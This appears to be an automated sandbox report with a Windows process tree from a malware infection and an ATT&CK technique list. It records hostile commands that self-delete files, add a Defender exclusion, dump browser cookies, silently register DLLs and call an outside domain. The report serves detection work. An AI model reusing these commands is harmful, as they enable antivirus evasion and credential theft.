"C:\Users\Admin\Documents\9kWSdKcNgkvHOt24yzplt4YC.exe"
10⤵
PID:7388

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Documents\9kWSdKcNgkvHOt24yzplt4YC.exe"
11⤵
PID:636

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
12⤵
- Runs ping.exe
PID:7900

C:\Users\Admin\Documents\UxxYnANoZ4g1kjmSRVHWw2PN.exe
"C:\Users\Admin\Documents\UxxYnANoZ4g1kjmSRVHWw2PN.exe"
10⤵
PID:7492

C:\Users\Admin\Documents\WZ4ihgJaRYmrIcYXcHOXanpl.exe
"C:\Users\Admin\Documents\WZ4ihgJaRYmrIcYXcHOXanpl.exe"
10⤵
PID:7544

C:\Users\Admin\Documents\ikVLl7A4VZ1f4lFpR9vAKpN5.exe
"C:\Users\Admin\Documents\ikVLl7A4VZ1f4lFpR9vAKpN5.exe"
10⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\QDAZ7KEBT3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QDAZ7KEBT3\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
11⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\QDAZ7KEBT3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QDAZ7KEBT3\multitimer.exe" 1 3.1616488355.6059a7a33d484 105
12⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\P8OH2HDA0M\setups.exe
"C:\Users\Admin\AppData\Local\Temp\P8OH2HDA0M\setups.exe" ll
11⤵
PID:4600

C:\Users\Admin\Documents\uT7XFe3Hr6wiMiYdB8tlUyi1.exe
"C:\Users\Admin\Documents\uT7XFe3Hr6wiMiYdB8tlUyi1.exe"
10⤵
PID:7696

C:\Users\Admin\Documents\vGTQfWenNwbpbscTzjrJob3g.exe
"C:\Users\Admin\Documents\vGTQfWenNwbpbscTzjrJob3g.exe"
10⤵
PID:7664

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:7540

C:\Users\Admin\Documents\MUigZ0V5u6ervnkaSQDPLN9u.exe
"C:\Users\Admin\Documents\MUigZ0V5u6ervnkaSQDPLN9u.exe"
10⤵
PID:7484

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:7376

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:2848

C:\Users\Admin\Documents\fJuOI2YWfyCka0ssldzPmaJK.exe
"C:\Users\Admin\Documents\fJuOI2YWfyCka0ssldzPmaJK.exe"
10⤵
PID:7380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7380 -s 480
11⤵
- Program crash
PID:6712

C:\Users\Admin\Documents\a2y5awblPdtK3F3QUn6jL9lp.exe
"C:\Users\Admin\Documents\a2y5awblPdtK3F3QUn6jL9lp.exe"
10⤵
PID:7256

C:\ProgramData\7313064.80
"C:\ProgramData\7313064.80"
11⤵
PID:7796

C:\ProgramData\6028165.66
"C:\ProgramData\6028165.66"
11⤵
PID:6544

C:\Users\Admin\Documents\jalPAtL0KCoHFN8oVuYIUQAs.exe
"C:\Users\Admin\Documents\jalPAtL0KCoHFN8oVuYIUQAs.exe"
10⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\5FUFUFBP7A\setups.exe
"C:\Users\Admin\AppData\Local\Temp\5FUFUFBP7A\setups.exe" ll
11⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\is-TNE9P.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TNE9P.tmp\setups.tmp" /SL5="$50250,290870,64000,C:\Users\Admin\AppData\Local\Temp\5FUFUFBP7A\setups.exe" ll
12⤵
PID:3892

C:\Users\Admin\AppData\Local\Temp\9EE72ADTZH\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9EE72ADTZH\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
11⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\9EE72ADTZH\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9EE72ADTZH\multitimer.exe" 1 3.1616488355.6059a7a328efa 105
12⤵
PID:7300

C:\Users\Admin\Documents\QFfDkq2oVo4LJVHSAqL3g5gE.exe
"C:\Users\Admin\Documents\QFfDkq2oVo4LJVHSAqL3g5gE.exe"
10⤵
PID:7216

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Documents\QFfDkq2oVo4LJVHSAqL3g5gE.exe"
11⤵
PID:4400

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
12⤵
- Runs ping.exe
PID:6112

C:\Users\Admin\Documents\tHgjb7S8e7tF7V1GHZmSQj1a.exe
"C:\Users\Admin\Documents\tHgjb7S8e7tF7V1GHZmSQj1a.exe"
10⤵
PID:7200

C:\ProgramData\2860116.31
"C:\ProgramData\2860116.31"
11⤵
PID:5236

C:\ProgramData\417076.4
"C:\ProgramData\417076.4"
11⤵
PID:2456

C:\Users\Admin\Documents\lnmZbxkLNiMNo1GKHJMbexec.exe
"C:\Users\Admin\Documents\lnmZbxkLNiMNo1GKHJMbexec.exe"
10⤵
PID:4164

C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe
"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"
9⤵
PID:5660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:5972

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
11⤵
- Kills process with taskkill
PID:5596

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:6080

C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
9⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\is-BE9II.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BE9II.tmp\LabPicV3.tmp" /SL5="$40430,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
10⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\is-4G115.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-4G115.tmp\ppppppfy.exe" /S /UID=lab214
11⤵
PID:5540

C:\Program Files\Uninstall Information\PXJKYQJFUZ\prolab.exe
"C:\Program Files\Uninstall Information\PXJKYQJFUZ\prolab.exe" /VERYSILENT
12⤵
PID:6848

C:\Users\Admin\AppData\Local\Temp\is-UOM9D.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UOM9D.tmp\prolab.tmp" /SL5="$503EC,575243,216576,C:\Program Files\Uninstall Information\PXJKYQJFUZ\prolab.exe" /VERYSILENT
13⤵
PID:6932

C:\Users\Admin\AppData\Local\Temp\b3-76562-91a-7bdb0-fd4d88e2d16bf\Casivilila.exe
"C:\Users\Admin\AppData\Local\Temp\b3-76562-91a-7bdb0-fd4d88e2d16bf\Casivilila.exe"
12⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\1b-8a9ab-a64-9ef82-7eecfb6b58c3e\Gapecaegozhae.exe
"C:\Users\Admin\AppData\Local\Temp\1b-8a9ab-a64-9ef82-7eecfb6b58c3e\Gapecaegozhae.exe"
12⤵
PID:6880

C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"
9⤵
PID:5248

C:\Program Files (x86)\Versium Research\Versium Research\HXyvSnwROl4S.exe
"C:\Program Files (x86)\Versium Research\Versium Research\HXyvSnwROl4S.exe"
9⤵
PID:5656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
10⤵
PID:6264

C:\Program Files (x86)\Versium Research\Versium Research\DataFinder.exe
"C:\Program Files (x86)\Versium Research\Versium Research\DataFinder.exe"
9⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\nfgmiq1tkqc\riy1ztnifxp.exe
"C:\Users\Admin\AppData\Local\Temp\nfgmiq1tkqc\riy1ztnifxp.exe" /VERYSILENT
6⤵
PID:496

C:\Users\Admin\AppData\Local\Temp\is-3IS82.tmp\riy1ztnifxp.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3IS82.tmp\riy1ztnifxp.tmp" /SL5="$5031C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\nfgmiq1tkqc\riy1ztnifxp.exe" /VERYSILENT
7⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\is-RLCRG.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-RLCRG.tmp\winlthsth.exe"
8⤵
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 596
9⤵
- Program crash
PID:5188

C:\Users\Admin\AppData\Local\Temp\az5mg2hbgko\vict.exe
"C:\Users\Admin\AppData\Local\Temp\az5mg2hbgko\vict.exe" /VERYSILENT /id=535
6⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\is-52058.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-52058.tmp\vict.tmp" /SL5="$201FE,870426,780800,C:\Users\Admin\AppData\Local\Temp\az5mg2hbgko\vict.exe" /VERYSILENT /id=535
7⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\is-72TC1.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-72TC1.tmp\winhost.exe" 535
8⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5AoHkg0S7.dll"
9⤵
PID:4176

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5AoHkg0S7.dll"
10⤵
PID:6164

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\5AoHkg0S7.dll"
11⤵
PID:6232

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5AoHkg0S7.dllUanePwdIs.dll"
9⤵
PID:6280

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5AoHkg0S7.dllUanePwdIs.dll"
10⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\sg2c3p1nekb\djvqkiilfxj.exe
"C:\Users\Admin\AppData\Local\Temp\sg2c3p1nekb\djvqkiilfxj.exe" testparams
6⤵
PID:5152

C:\Users\Admin\AppData\Roaming\pjczybmaoap\2rb4pnhjkd1.exe
"C:\Users\Admin\AppData\Roaming\pjczybmaoap\2rb4pnhjkd1.exe" /VERYSILENT /p=testparams
7⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\is-415N5.tmp\2rb4pnhjkd1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-415N5.tmp\2rb4pnhjkd1.tmp" /SL5="$701E4,290870,64000,C:\Users\Admin\AppData\Roaming\pjczybmaoap\2rb4pnhjkd1.exe" /VERYSILENT /p=testparams
8⤵
PID:2908

C:\Users\Admin\AppData\Local\Temp\s4urozrw0k4\inuufz2vfip.exe
"C:\Users\Admin\AppData\Local\Temp\s4urozrw0k4\inuufz2vfip.exe" /ustwo INSTALL
6⤵
PID:5268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 656
7⤵
- Program crash
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 624
7⤵
- Program crash
PID:5452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 700
7⤵
- Program crash
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 800
7⤵
- Program crash
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 880
7⤵
- Program crash
PID:5924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 928
7⤵
- Program crash
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 1104
7⤵
- Program crash
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 1176
7⤵
- Program crash
PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 1148
7⤵
- Program crash
PID:4252

C:\Users\Admin\AppData\Local\Temp\a0krbg2jflz\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\a0krbg2jflz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
6⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\is-1OPHR.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1OPHR.tmp\IBInstaller_97039.tmp" /SL5="$30354,9882008,721408,C:\Users\Admin\AppData\Local\Temp\a0krbg2jflz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
7⤵
PID:5512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
8⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\is-2D60R.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-2D60R.tmp\{app}\chrome_proxy.exe"
8⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\ypvuu55pmkb\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\ypvuu55pmkb\vpn.exe" /silent /subid=482
6⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\is-FT3S4.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FT3S4.tmp\vpn.tmp" /SL5="$40320,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ypvuu55pmkb\vpn.exe" /silent /subid=482
7⤵
PID:5524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
8⤵
PID:5824

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
9⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
8⤵
PID:6640

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
9⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\jeskgorbxgg\USATOPEU.exe
"C:\Users\Admin\AppData\Local\Temp\jeskgorbxgg\USATOPEU.exe"
6⤵
PID:5440

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
7⤵
PID:5780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c CmD < Lavorato.eml
7⤵
PID:5956

C:\Windows\SysWOW64\cmd.exe
CmD
8⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\02w0puukzfs\okbngmd1yze.exe
"C:\Users\Admin\AppData\Local\Temp\02w0puukzfs\okbngmd1yze.exe" 57a764d042bf8
6⤵
PID:5288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\Q6JO5W0PWK\Q6JO5W0PW.exe" 57a764d042bf8 & exit
7⤵
PID:5416

C:\Program Files\Q6JO5W0PWK\Q6JO5W0PW.exe
"C:\Program Files\Q6JO5W0PWK\Q6JO5W0PW.exe" 57a764d042bf8
8⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\djuca3nilux\app.exe
"C:\Users\Admin\AppData\Local\Temp\djuca3nilux\app.exe" /8-23
6⤵
PID:5588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Summer-Paper"
7⤵
PID:5772

C:\Program Files (x86)\Summer-Paper\7za.exe
"C:\Program Files (x86)\Summer-Paper\7za.exe" e -p154.61.71.13 winamp-plugins.7z
7⤵
PID:6500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Summer-Paper\app.exe" -map "C:\Program Files (x86)\Summer-Paper\WinmonProcessMonitor.sys""
7⤵
PID:6748

C:\Program Files (x86)\Summer-Paper\app.exe
"C:\Program Files (x86)\Summer-Paper\app.exe" -map "C:\Program Files (x86)\Summer-Paper\WinmonProcessMonitor.sys"
8⤵
PID:6896

C:\Program Files (x86)\Summer-Paper\7za.exe
"C:\Program Files (x86)\Summer-Paper\7za.exe" e -p154.61.71.13 winamp.7z
7⤵
PID:5964

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4812

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5000

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4192

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\is-R82H6.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R82H6.tmp\setups.tmp" /SL5="$40252,290870,64000,C:\Users\Admin\AppData\Local\Temp\P8OH2HDA0M\setups.exe" ll
1⤵
PID:5840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4360

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8080

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery